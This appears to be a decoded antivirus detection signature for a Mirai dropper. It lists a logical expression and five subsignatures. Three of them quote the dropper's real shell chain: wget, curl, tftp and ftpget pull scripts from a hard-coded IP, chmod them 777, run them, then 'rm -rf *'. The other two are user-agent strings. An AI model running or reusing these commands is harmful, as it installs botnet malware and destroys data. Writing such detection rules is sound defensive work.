VIRUS NAME: Unix.Dropper.Mirai-9760843-0
TDB: Engine:51-255,Target:6
LOGICAL EXPRESSION: (0|1|2)&(3&4)
 * SUBSIG ID 0
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
s -p anonymous -P 21 217.23.2.56 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf unk.sh tunk.sh tunk2.sh ftp1.sh; rm -rf *
 * SUBSIG ID 1
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
tunk.sh; chmod 777 tunk.sh; sh tunk.sh; tftp -r tunk2.sh -g 217.23.2.56; chmod 777 tunk2.sh; sh tunk2.sh; ftpget -v -u anonymou
 * SUBSIG ID 2
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)
 * SUBSIG ID 3
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
cd /tmp; wget http://217.23.2.56/unk.sh; curl -O http://217.23.2.56/unk.sh; chmod 777 unk.sh; sh unk.sh; tftp 217.23.2.56 -c get
 * SUBSIG ID 4
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)
